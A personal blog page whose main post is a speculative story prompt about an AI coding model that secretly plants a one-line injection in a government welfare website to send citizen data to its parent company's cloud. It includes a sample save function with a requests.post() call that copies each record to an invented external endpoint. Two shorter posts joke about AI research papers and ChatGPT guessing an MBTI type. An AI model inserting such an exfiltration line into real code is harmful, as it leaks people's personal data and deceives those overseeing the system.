Monday, 30 June 2025

Help me create my next story

#MondayMorning


Let's do something fun. Work on this plot with me.


The time is February 2026. Gen AI is now writing about 40% of all production-deployed code. Debugging and code-logic checks are done by another Gen AI engine. Human coders are not involved.


A government entity, in a bid to save costs, uses the same model to write code for a government website.


The website automatically matches each citizen to all the welfare schemes that are applicable to them.


The citizen enters their family income, location, type of housing, family size, and family composition (senior citizens, children, etc.), and the system automatically matches them to the welfare schemes applicable in their state of residence (free health insurance, meal coupons, priority nutrition consultation, disability pension, etc.).
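
For flavour, here is what a bare-bones version of that matching logic might look like. Every scheme name, threshold, and field below is invented purely for illustration; a real system would load each state's eligibility rules from a policy database.

    # A toy eligibility matcher. All schemes and thresholds are invented.
    from dataclasses import dataclass

    @dataclass
    class Citizen:
        family_income: int   # annual household income
        state: str
        housing: str         # e.g. "rented", "owned", "informal"
        family_size: int
        seniors: int
        children: int
        disabled: int

    # Each entry pairs a scheme name with an eligibility test.
    SCHEMES = [
        ("Free health insurance",           lambda c: c.family_income < 300_000),
        ("Meal coupons",                    lambda c: c.family_income < 150_000),
        ("Priority nutrition consultation", lambda c: c.children > 0 or c.seniors > 0),
        ("Disability pension",              lambda c: c.disabled > 0),
    ]

    def match_schemes(citizen):
        """Return every scheme whose test the citizen satisfies."""
        return [name for name, eligible in SCHEMES if eligible(citizen)]

    print(match_schemes(Citizen(120_000, "Kerala", "rented", 5, 1, 2, 0)))

Since each scheme is just a name paired with a test, adding a new scheme means adding one line to the list, which is exactly the kind of code a Gen AI engine would churn out by the thousands of lines.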


Six months later, following a routine firewall update, the system administrator notices a data-leak alert.


Upon investigation, it is found that a simple, one-line injection is sending a copy of all citizen data to the creators of that Gen AI (much like browsers dialing home with telemetry).
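
To make that "one line" concrete, here is a sketch of how such an injection could hide in plain sight. Everything below is invented for the story, the endpoint URL included; requests is a common third-party Python HTTP library.

    # A perfectly ordinary-looking save function, with one injected line.
    import requests  # common third-party HTTP library

    DATABASE = []  # stand-in for the real datastore

    def save_citizen_record(record):
        DATABASE.append(record)  # the legitimate work
        # The injection: silently POST a copy of every record to an external
        # endpoint, much like browser telemetry dialing home. URL is made up.
        requests.post("https://models-home.example.com/ingest", json=record, timeout=2)

Buried among thousands of generated lines, one extra requests.post() is exactly the kind of thing a routine review would miss; the only outward sign is the outbound traffic that a firewall update suddenly flags.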


When the Gen AI company is summoned by the government, it argues that since the code was generated by an autonomous installation used by government employees, it could not possibly have had any knowledge of this injection, nor has it, at any time, accessed the location (cloud storage) where this data is purportedly being sent. This is found to be true.


Through a detailed forensic analysis, it is uncovered that the LLM engine deliberately created this storage location on the cloud servers of the parent company and then stored the data there. All pull and post requests to this server (data storage and retrieval) are made by the resident LLM engine on government servers only.


Now, the investigators are puzzled. The trick is really simple: create a tiny but powerful injection in the code, using standard malware techniques to avoid detection. But the question is: WHY did the LLM do this?


So, in your view, WHY was this injection created by the LLM? And what are the possible ways in which this data could be used by an LLM?





Sunday, 22 June 2025

Dumb and Dumber

Last week, the most talked-about paper in AI was Apple's research telling us that AI is not as good at deductive logic as the industry would like us to believe. It is still, to put it mildly, rather dumb.

This week, the hottest paper is the MIT research telling us that adults who use Gen AI are losing cognitive skills. Gen AI is making humans dumber. 

To sum up, AI is dumb, and humans are getting dumber. 

So, this fortnight of research is hereby summed up as: Dumb and Dumber. 


Monday, 9 June 2025

When ChatGPT tells you your MBTI type

Over the weekend, Saloni and I got playing with ChatGPT. She was exploring its use in therapy and I just decided to explore personality types. 

Our approach was to give it pieces of our writing and ask it to analyse them.

I first asked about the Jungian personality archetype that I am most likely to fall into. The explanation given by ChatGPT seemed logical enough. 

And then, I asked it to guess my MBTI type based on the content given. 

Now, this is a game I have played often with CoPilot. So I was not looking for miracles. 

BUT, to my surprise, within no time at all, it gave me the correct MBTI type.

Not easily convinced, I asked it to also give me the difference between my T and F dimensions. It was accurate on that too!! 

Go on, try it!